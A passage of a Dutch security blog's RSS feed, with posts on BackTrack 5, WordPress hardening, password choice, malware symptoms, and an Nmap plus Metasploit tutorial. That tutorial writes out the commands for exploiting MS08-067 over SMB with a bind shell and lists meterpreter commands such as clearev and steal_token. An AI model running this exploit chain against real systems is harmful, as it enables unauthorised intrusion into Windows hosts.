<p>BackTrack 4 was niet volledig open-source omdat er niet voldoende bronnen waren om gebruik van te maken tijdens de ontwikkeling van de BT4 ontwikkelomgeving. Om toch volledig open-source te worden hebben ze de handen ineen geslagen met Offensive Security. Samen met hun hebben ze een nieuwe “degelijke” ontwikkelomgeving gebouwd. Naar eigen zeggen kunnen ze hier best wel waanzinnige dingen mee.</p>
<p>De lijst met tools is compleet bijgewerkt een aangepast. Ze hebben iedere tool opnieuw getest op functionaliteit en hebben aan de hand van die resultaten besloten of deze wel of niet in BT5 zou terugkeren. Uiteraard hebben ze ook nieuwe tools getest en, wanneer goed genoeg, toegevoegd aan de repositories. Ook de menustructuur is geoptimaliseerd. Aan de hand van de PTES en OSSTMM standards hebben ze de menustructuur strakker en simpeler gemaakt. Hierdoor zou men makkelijker de benodigde tools kunnen vinden.</p>
<p>Ook de roadmap is eindelijk bijgewerkt en hebben ze de releasedatum van BackTrack 5 “revolution” vastgesteld, 10 mei 2011 is het zo ver!</p>
<p>Mocht je nog tools weten dan mag je deze aan hun doorgeven door middel van een formulier op onderstaande link. Dit is vanaf nu nog 4 weken. Let wel op dat deze tools niet in BackTrack 4 moeten zitten.</p>
<p>Bron: <a href="http://www.backtrack-linux.org/backtrack/backtrack-5-release-tool-suggestions/" target="_blank">BackTrack-Linux.org</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.huseyinkaya.nl/2011/03/23/backtrack-5-revolution/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>9 beveiligings tips voor WordPress</title>
		<link>http://www.huseyinkaya.nl/2011/01/14/9-beveiligings-tips-voor-wordpress/</link>
		<comments>http://www.huseyinkaya.nl/2011/01/14/9-beveiligings-tips-voor-wordpress/#comments</comments>
		<pubDate>Fri, 14 Jan 2011 20:44:31 +0000</pubDate>
		<dc:creator>Huseyin</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[wordpress]]></category>

		<guid isPermaLink="false">http://www.huseyinkaya.nl/?p=697</guid>
		<description><![CDATA[<p>Posted in <a href="http://www.huseyinkaya.nl/tumblog/images/">Images</a></p><p><a href="http://www.huseyinkaya.nl/2011/01/14/9-beveiligings-tips-voor-wordpress/" title="image"><img src="http://www.huseyinkaya.nl/wp-content/uploads/2011/01/wordpress1.jpg" alt="image" width="563" /></a></p>1 Bescherm je Plugin map Plugin map is te vinden op {Wordpress root}/wp-content/plugins. In oudere versies van WordPress was deze map niet goed beveiligd,&#8230;]]></description>
			<content:encoded><![CDATA[<h1>1 Bescherm je Plugin map</h1>
<p>Plugin map is te vinden op {Wordpress root}/wp-content/plugins. In oudere versies van WordPress was deze map niet goed beveiligd, maar in meest recente versies is het al beter beveiligd. Makkelijkste manier om het te beveiligen is om een lege HTML bestand aan te maken genaamd index.html, dit zal ervoor zorgen dat ze niet makkelijk in die map kunnen kijken. Controleer of deze bestand te vinden is.</p>
<h1>2 Verberg WordPress versie</h1>
<p>Als een kwaadwillende persoon de versie van je WordPress weet maakt dit hem makkelijker op kwetsbaarheden te zoeken. Standaard geeft WordPress het weer. Met een simpele aanpassing aan het script kun je ervoor zorgen dat dit niet meer zichtbaar is. Zoek naar het header.php en verander het volgende lijn:</p>
<p>&lt;meta name=&#8221;generator&#8221; content=&#8221;WordPress &lt;?php bloginfo(&#8220;version&#8221;); ?&gt;&#8221; /&gt;</p>
<p>naar:</p>
<p>&lt;meta name=&#8221;generator&#8221; content=&#8221;WordPress&#8221; /&gt;</p>
<h1>﻿﻿3 gebruik een sterke wachtwoord</h1>
<p>Ik weet dat dit wel logisch kan zijn voor sommige, maar ik wil er nog op duiden dat het echt belangrijk is. Tot WP 3.0 was de standaard gebruiker admin, tegenwoordig kun je nu je eigen gebruikersnaam creëren, dit maak niet per direct veilig maar maakt het kans op brute force kleiner. Gebruik ook geen simpele wachtwoord zoals een datum of een woord die makkelijk te vinden is in een woordenboek. Je kunt het beste letters combineren met cijfers, dit zal ervoor zorgen dat het moeilijker wordt om een succesvolle brute force op uit te voeren.</p>
<h1>4 verander regelmatig je wachtwoord</h1>
<p>Persoonlijke wachtwoorden worden niet regelmatig veranderd en er wordt ook overal hetzelfde wachtwoord gebruikt. Dit betekend dat als er maar op een site je wachtwoord onderschept wordt, deze op alle sites succesvol toegepast kan worden.</p>
<h1>5 hou je plug-ins up-to-date</h1>
<p>Normaliter zal WordPress aangeven als er updates zijn voor plug-ins die je gebruikt. Zorg ervoor dat je dit ook doet want er kunnen kwetsbaarheden bekend zijn van oudere plug-ins die misbruikt kunnen worden. Er is natuurlijk ook een kans als je update dat er nieuwe kwetsbaarheden plaats kunnen vinden die nog gevonden moeten worden. Je hebt altijd het risico.</p>
<h1>6 maak gebruik van een secret key</h1>
<p>Het is raar maar WordPress slaat je gegevens (gebruikersnaam, wachtwoord en database adres) op in platte tekst, dit is natuurlijk niet slim. WordPress heeft hiervoor een oplossing, maar voor een of ander reden weten veel dit niet. WordPress project heeft hiervoor een “<a href="http://codex.wordpress.org/Editing_wp-config.php#Security_Keys" target="_blank">secret key</a>”. Volg <a href="https://api.wordpress.org/secret-key/1.1/" target="_blank">deze link</a> en genereer een key, zet de gegevens bij gebruiker(user) wachtwoord(password) en adres(adress) velden.</p>
<h1>7 Back-up</h1>
<p>Het kan altijd voorkomen dat er iets mis gaat, zorg er dan voor dat je een back-up hebt.  Als je regelmatig back-ups bijhoud dan zul je er ook zeker van zijn dat je niks kwijt zal raken. Als je op google zoekt zul je genoeg tools vinden die je hierbij kunnen helpen. Ik zelf maak gebruik van “backupify”.</p>
<h1>8 beperk foutieve inlog pogingen</h1>
<p>Maak gebruik van een plugin zoals “<a href="http://http://wordpress.org/extend/plugins/login-lockdown/" target="_blank">Login LockDown</a>” om ervoor te zorgen dat een persoon niet te vaak foutief probeert in te loggen. Dit is weer een middel om tegen brute force aanvallen te gaan of dat mensen niet proberen om je wachtwoord te raden. Login LockDown monitort het aantal foutieve inlog pogingen en als het te vaak voorkomt komt het IP in de blacklist en kan deze persoon niet meer inloggen.</p>
<h1>9 Scan naar kwetsbaarheden</h1>
<p>&#8220;<a href="http://wordpress.org/extend/plugins/wp-security-scan/" target="_blank">WP security scan</a>&#8221; en &#8220;<a href="http://blogsecurity.net/WordPress/tools/wp-scanner" target="_blank">WordPress Scanner</a>&#8221; zijn twee plugins die je WordPress installatie, plugins, thema&#8217;s etc controleren voor kwetsbaarheden. Maak er gebruik van.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.huseyinkaya.nl/2011/01/14/9-beveiligings-tips-voor-wordpress/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Wachtwoord keuze &#124; Belangrijk!</title>
		<link>http://www.huseyinkaya.nl/2010/12/22/wachtwoord-keuze-belangrijk/</link>
		<comments>http://www.huseyinkaya.nl/2010/12/22/wachtwoord-keuze-belangrijk/#comments</comments>
		<pubDate>Wed, 22 Dec 2010 19:45:11 +0000</pubDate>
		<dc:creator>Huseyin</dc:creator>
				<category><![CDATA[Informatie]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[wachtwoord]]></category>

		<guid isPermaLink="false">http://www.huseyinkaya.nl/?p=588</guid>
		<description><![CDATA[<p>Posted in <a href="http://www.huseyinkaya.nl/category/informatie/" title="Informatie">Informatie</a><a href="http://www.huseyinkaya.nl/category/security/" title="security">security</a></p>Laatste tijd hoor ik veel op het nieuws dat er wachtwoorden gestolen zijn. Komt dit omdat websites slecht beveiligd zijn? Niet helemaal, natuurijk verwacht&#8230;]]></description>
			<content:encoded><![CDATA[<p>Laatste tijd hoor ik veel op het nieuws dat er wachtwoorden gestolen zijn. Komt dit omdat websites slecht beveiligd zijn? Niet helemaal, natuurijk verwacht je dat een site veilig moet zijn maar ik denk ook dat mensen meestal zelf de schuld zijn dat hun account wordt overgenomen. Om me heen hoor ik wel eens van mensen “mijn msn is gehacked” of &#8220;mijn facebook is gehacked&#8221;  en geven het bedrijf de schuld hiervan, ik verwacht ook niet dat mensen weten wat hacking is. Ik probeer dan altijd uit te leggen dat het bijna niet mogelijk de schuld van msn of facebook is, meestal is het iemand die ze kennen en de wachtwoord geraden heeft. Ik vertel dan ook altijd dat ze een sterk wachtwoord moeten kiezen. Uit een onderzoek (een tijdje terug) van <a href="http://www.imperva.com/docs/WP_Consumer_Password_Worst_Practices.pdf" target="_blank">Imperva</a> bleek dat mensen te makkelijk wachtwoord gebruiken die zo geraden kunnen worden. Hieronder zijn de tien meest gebruikte wachtwoorden:</p>
<ol>
<li>123456</li>
<li>12345</li>
<li>123456789</li>
<li>Password</li>
<li>iloveyou</li>
<li>princess</li>
<li>rockyou</li>
<li>1234567</li>
<li>12345678</li>
<li>abc123</li>
</ol>
<p>Dit onderzoek heeft in amerika plaats gevonden maar het zal niet veel verschillen in Nederland, natuurlijk kan “password” wachtwoord zijn. Mensen moeten echt begrijpen dat een wachtwoord keuze een grote rol kan hebben bij het veiligheid van je account. Ik krijg meestal als antwoord dat ze het dan niet goed kunnen ontouden omdat het dan te lastig wordt, dit is niet helemaal als je het vaak genoeg gebruikt zal het na een tijdje automatisch gaan. Ik heb zelf tientallen wachtwoorden en ik weet meeste uit mijn hoofd en als ik er eentje niet weet heb ik een wachtwoord manager. Hieronder zijn een aantal tips voor een sterk wachtwoord:</p>
<ul>
<li>Maak een wachtwoord die bestaat uit minimaal 8 karakters. Een wachtwoord die langer is dan 8 karakters zal er voor zorgen dat het bruteforcen lastiger wordt. Bruteforce probeert allerlei verschillende wachtwoord totdat de juiste wordt gevonden.</li>
<li>Zorg ervoor dat je wachtwoord niet makkelijk te raden is. Dit betekend dat je geen gebruik moet maken van namen. Meeste gebruiken namen van hun huisdier, geboorte datum of telefoon nummer, dit is niet slim om te gebruiken. Als iemand je al een beetje kent, kan deze hier heel snel achterkomen.</li>
<li>Gebruik geen woorden die vindbaar zijn in een woordenboek. Je kunt tegenwoordig een woordenboek digitaal downloaden en dit wordt ook gebruikt bij bruteforce aanvallen. Tijdens een bruteforce wordt gebruik gemaakt van digitale woordenboeken om de woorden die erin staan te gebruiken om wachtwoorden te achterhalen.</li>
<li>Gebruik geen simpele combinaties van cijfers/letters bijvoorbeeld: 77777, 12345 of abcde.</li>
<li>Maak een wachtwoord die uit verschillende karakters bestaat zoals letters, cijfers en speciale tekens. Hoe meer je gebruik maakt van verschillende karakters hoe lastiger het is om het te kraken.</li>
<li>Gebruik voor verschillende sites andere wachtwoorden, zodat wanneer de site gehacked wordt de hacker niet beschikt over andere wachtwoorden van bijvoorbeeld je mail.</li>
<li>Verander regelmatig je wachtwoord, wanneer een persoon dan achter je wachtwoord komt kan hij deze niet lang gebruiken.</li>
<li>Gebruik een goede wachtwoord manager, niet die standaard in je browser zit.</li>
</ul>
<p>Ik hoop dat het doordringt bij mensen dat wachtwoord keuze een belangrijke rol heeft bij het kraken van wachtwoorden en dat je account overgenomen wordt. Dit is niet alles maar is wel een grote stap.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.huseyinkaya.nl/2010/12/22/wachtwoord-keuze-belangrijk/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nmap + Metasploit tutorial</title>
		<link>http://www.huseyinkaya.nl/2010/10/29/nmap-metasploit-tutorial/</link>
		<comments>http://www.huseyinkaya.nl/2010/10/29/nmap-metasploit-tutorial/#comments</comments>
		<pubDate>Fri, 29 Oct 2010 17:00:14 +0000</pubDate>
		<dc:creator>Huseyin</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[Tutorials]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[nmap]]></category>

		<guid isPermaLink="false">http://www.huseyinkaya.nl/?p=553</guid>
		<description><![CDATA[<p>Posted in <a href="http://www.huseyinkaya.nl/category/security/" title="security">security</a><a href="http://www.huseyinkaya.nl/category/tutorials/" title="Tutorials">Tutorials</a></p>Hieronder is een filmpje die laat zien hoe je gebruik kunt maken van de ms08_067 exploit, dit is ook de exploit die gebruikt is&#8230;]]></description>
			<content:encoded><![CDATA[<p>Hieronder is een filmpje die laat zien hoe je gebruik kunt maken van de ms08_067 exploit, dit is ook de exploit die gebruikt is door conficker.</p>
<p>Om dit uit te voeren heb je de volgende applicaties nodig:</p>
<p>- <a title="Metasploit" href="http://www.metasploit.com/" target="_blank">Metasploit</a></p>
<p>- <a title="Nmap" href="http://nmap.org/" target="_blank">Nmap</a></p>
<p>Je kunt het ook zonder nmap doen maar dan weet je niet zeker of je exploit gaat werken.</p>
<p><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="480" height="385" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="src" value="http://www.youtube.com/v/_tXhGpffL7s?fs=1&amp;hl=en_US" /><param name="allowfullscreen" value="true" /><embed type="application/x-shockwave-flash" width="480" height="385" src="http://www.youtube.com/v/_tXhGpffL7s?fs=1&amp;hl=en_US" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>Uitgevoerde commando bij Nmap is:</p>
<blockquote><p>﻿﻿nmap -PN -T4 -p139,445 -n -v &#8211;script smb-check-vulns,smb-os-discovery &#8211;script-args unsafe=1 192.168.178.33</p></blockquote>
<p>Vergeet wel niet het IP adres te veranderen aan het eind</p>
<p>Uigevoerde opdrachten in Metasploit:</p>
<blockquote><p>use windows/smb/ms08_067_netapi</p>
<p>set payload generic/shell_bind_tcp</p>
<p>Set Rhost 192.168.178.33</p>
<p>exploit</p></blockquote>
<p>Uitleg opdrachten:</p>
<p><strong>use windows/smb/ms08_067_netapi</strong>: is het exploit die we gaan gebruiken. smb (service message block) wordt gebruikt om gedeelte mappen en printers te delen over het netwerk.</p>
<p><strong>set payload generic/shell_bind_tcp</strong>: payload wordt gebruikt om data te verzenden over het netwerk en met deze commando gaan we verbinding maken met het command interface die door TCP protocol gaat.</p>
<p><strong>set Rhost 192.168.178.33</strong>: hier stellen we het IP adres in van de server waar we het exploit op willen gebruiken. Vergeet hier niet om het IP adres te veranderen.</p>
<p><strong>exploit</strong>: ik denk dat dit wel voor zich spreekt.</p>
<p>Als het succesvol is kom je in &#8220;meterpreter&#8221; vanuit hier kun je opdrachten doorgeven: hieronder is de help bestand:</p>
<blockquote>
<h1>Core Commands</h1>
<h2>Command Description</h2>
<p><strong>?</strong> Help menu</p>
<p><strong>background</strong> Backgrounds the current session</p>
<p><strong>bgkill</strong> Kills a background meterpreter script</p>
<p><strong>bglist</strong> Lists running background scripts</p>
<p><strong>bgrun</strong> Executes a meterpreter script as a background thread</p>
<p><strong>channel</strong> Displays information about active channels</p>
<p><strong>close</strong> Closes a channel</p>
<p><strong>exit</strong> Terminate the meterpreter session</p>
<p><strong>help</strong> Help menu</p>
<p><strong>interact </strong> Interacts with a channel</p>
<p><strong>irb</strong> Drop into irb scripting mode</p>
<p><strong>migrate</strong> Migrate the server to another process</p>
<p><strong>quit</strong> Terminate the meterpreter session</p>
<p><strong>read</strong> Reads data from a channel</p>
<p><strong>run</strong> Executes a meterpreter script</p>
<p><strong>use</strong> Load a one or more meterpreter extensions</p>
<p><strong>write</strong> Writes data to a channel</p>
<h2>Stdapi: File system Commands</h2>
<p><strong>cat</strong> Read the contents of a file to the screen</p>
<p><strong>cd</strong> Change directory</p>
<p><strong>del</strong> Delete the specified file</p>
<p><strong>download</strong> Download a file or directory</p>
<p><strong>edit</strong> Edit a file</p>
<p><strong>getlwd</strong> Print local working directory</p>
<p><strong>getwd</strong> Print working directory</p>
<p><strong>lcd</strong> Change local working directory</p>
<p><strong>lpwd</strong> Print local working directory</p>
<p><strong>ls</strong> List files</p>
<p><strong>mkdir</strong> Make directory</p>
<p><strong>pwd</strong> Print working directory</p>
<p><strong>rm</strong> Delete the specified file</p>
<p><strong>rmdir</strong> Remove directory</p>
<p><strong>search</strong> Search for files</p>
<p><strong>upload</strong> Upload a file or directory</p>
<h2>Stdapi: Networking Commands</h2>
<p><strong>ipconfig</strong> Display interfaces</p>
<p><strong>portfwd</strong> Forward a local port to a remote service</p>
<p><strong>route</strong> View and modify the routing table</p>
<h2>Stdapi: System Commands</h2>
<p><strong>clearev</strong> Clear the event log</p>
<p><strong>drop_token</strong> Relinquishes any active impersonation token.</p>
<p><strong>execute</strong> Execute a command</p>
<p><strong>getpid</strong> Get the current process identifier</p>
<p><strong>getprivs</strong> Get as many privileges as possible</p>
<p><strong>getuid</strong> Get the user that the server is running as</p>
<p><strong>kill</strong> Terminate a process</p>
<p><strong>ps</strong> List running processes</p>
<p><strong>reboot</strong> Reboots the remote computer</p>
<p><strong>reg</strong> Modify and interact with the remote registry</p>
<p><strong>rev2self</strong> Calls RevertToSelf() on the remote machine</p>
<p><strong>shell</strong> Drop into a system command shell</p>
<p><strong>shutdown</strong> Shuts down the remote computer</p>
<p><strong>steal_token</strong> Attempts to steal an impersonation token from the target process</p>
<p><strong>sysinfo</strong> Gets information about the remote system, such as OS</p></blockquote>
<p>Als iets niet duidelijk is of vragen hebt kun je altijd contact opnemen</p>
]]></content:encoded>
			<wfw:commentRss>http://www.huseyinkaya.nl/2010/10/29/nmap-metasploit-tutorial/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Wanneer ben ik besmet?</title>
		<link>http://www.huseyinkaya.nl/2010/08/06/wanneer-ben-ik-besmet/</link>
		<comments>http://www.huseyinkaya.nl/2010/08/06/wanneer-ben-ik-besmet/#comments</comments>
		<pubDate>Fri, 06 Aug 2010 10:17:26 +0000</pubDate>
		<dc:creator>Huseyin</dc:creator>
				<category><![CDATA[security]]></category>
		<category><![CDATA[Tips]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[trojan]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://www.huseyinkaya.nl/?p=506</guid>
		<description><![CDATA[<p>Posted in <a href="http://www.huseyinkaya.nl/category/security/" title="security">security</a><a href="http://www.huseyinkaya.nl/category/tips/" title="Tips">Tips</a></p>Veel computer gebruikers komen met problemen dat hun pc langzaam is en niet meer goed werkt. Meestal zeg ik dan dat het kan komen&#8230;]]></description>
			<content:encoded><![CDATA[<p style="margin-bottom: 0cm;">Veel computer gebruikers komen met problemen dat hun pc langzaam is en niet meer goed werkt. Meestal zeg ik dan dat het kan komen door een virus, standaard antwoord hierop is dan “maar ik heb een virusscanner”. Tegenwoordig is dit niet meer genoeg.</p>
<p style="margin-bottom: 0cm;">Als je een beetje verstand hebt van computers kun je nog merken dat je geïnfecteerd bent. Maar de meeste gebruikers hebben niet zoveel verstand en zullen het niet snel doorhebben. Dit heeft niets met de gebruiker te maken maar meer dat de meeste bedreigingen zo gemaakt om niet op te vallen.</p>
<p style="margin-bottom: 0cm;">PandaLabs heeft een lijstje gemaakt met de 10 meest voorkomende symptomen als je besmet bent. Dit zal gebruikers alerter maken en sneller begrijpen dat ze besmet zijn.</p>
<ol>
<li>
<p style="margin-bottom: 0cm;"><strong>Computer praat tegen je:</strong> Je 	krijgt regelmatig pop-ups meldingen dat je computer besmet is en dat 	je het schoon moet maken en je computer beschermen. Dit is een van 	de meest voorkomende kwaal. Je bent dan waarschijnlijk besmet door 	spyware of een namaak anti-virus (ook wel “rogueware” genoemd). 	Meestal moet je je creditcard gegevens invullen om een betaalde 	versie te krijgen om van alle virussen af te komen. <em><span style="font-weight: normal;">Doe 	dit nooit.</span></em></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><strong>Mijn computer is extreem 	langzaam:</strong><span style="font-weight: normal;"> Als je pc langzamer 	werkt dan normaal, dit kan een symptoom zijn van meerdere oorzaken. 	Als je besmet bent door een Virus, Worm, Trojan dan kan je pc ook 	langzamer werken. Dit komt omdat deze besmetting vormen op de 	achtergrond werken waardoor je systeem langzamer van kan worden.</span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><strong>Applicaties starten/werken niet 	meer:</strong><span style="font-weight: normal;"> het kan voorkomen dat je 	sommige applicaties niet meer kunt starten maakt niet uit hoe vaak 	je je pc opnieuw hebt gestart of meerdere malen geprobeerd hebt. Dit 	kan ook een teken zijn dat er iets mis is.</span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><strong>Ik krijg geen verbinding met 	het internet of is langzaam:</strong><span style="font-weight: normal;"> Een zwakke internet verbinding is ook een van de meest voorkomende 	symptomen. Je moet wel niet te snel concluderen dat er iets mis is 	met je pc, de oorzaak kan ook altijd je provider of je router zijn. 	Als het gaat om een besmetting dan kan je internet ook langzaam 	zijn. Dit komt omdat malware ook verbinding maakt met het internet 	en meerdere sessies start. Dit zorgt ervoor dat er op de achtergrond 	data verwerkt wordt en je bandbreedte gebruikt.</span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><strong>Tijdens het surfen op het web 	krijg je ongewenste reclames en pagina&#8217;s:</strong><span style="font-weight: normal;"> Dit is een ander teken van bepaalde infecties. Meeste bedreigingen 	zijn zo gemaakt dat ze je verbinding manipuleren en je naar andere 	sites sturen en zelfs sites namaken. Soms kan het zelfs voorkomen 	dat je het niet eens merkt dat je op een valse site zit.</span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><strong>Waar zijn mijn bestanden:</strong><span style="font-weight: normal;"> Ik hoop dat niemand te maken krijg met dit soort infecties. Het kan 	nog altijd voorkomen dat je besmet wordt met een virus die gegevens 	verwijderd. Als dit voorkomt dan zou ik me echt zorgen maken.</span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><strong>Anti-virus is weg en firewall 	is  werkt niet meer:</strong><span style="font-weight: normal;"> Wat ook 	nog veel voorkomt is dat wanneer je besmet wordt je anti-virus 	verwijderd en je firewall uitgeschakeld wordt. Dit betekend dan dat 	je helemaal niet meer beschermd bent en zo virussen, malware, trojan 	zijn werk rustig kan doen. </span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><strong>Computer praat in een ander 	taal:</strong><span style="font-weight: normal;"> Als de taal van bepaalde 	applicaties veranderd of het is niet fatsoenlijk nederlands dan kun 	je van zeker zijn dat je besmet bent.</span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><strong>Er verdwijnen bestanden die 	nodig zijn voor applicaties/games:</strong><span style="font-weight: normal;"> je hoeft er niet lang over na te denken, dit is ook een teken van 	besmetting.</span></p>
</li>
<li>
<p style="margin-bottom: 0cm;"><strong>Computer is gek geworden:</strong><span style="font-weight: normal;"> Als je pc activiteiten verricht waar je niks mee te maken hebt zoals 	dat er mails gestuurd worden, berichten gestuurd worden naar je 	vrienden, opent internet pagina&#8217;s. Dan kun je zeker van zijn dat je 	besmet bent</span></p>
</li>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.huseyinkaya.nl/2010/08/06/wanneer-ben-ik-besmet/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

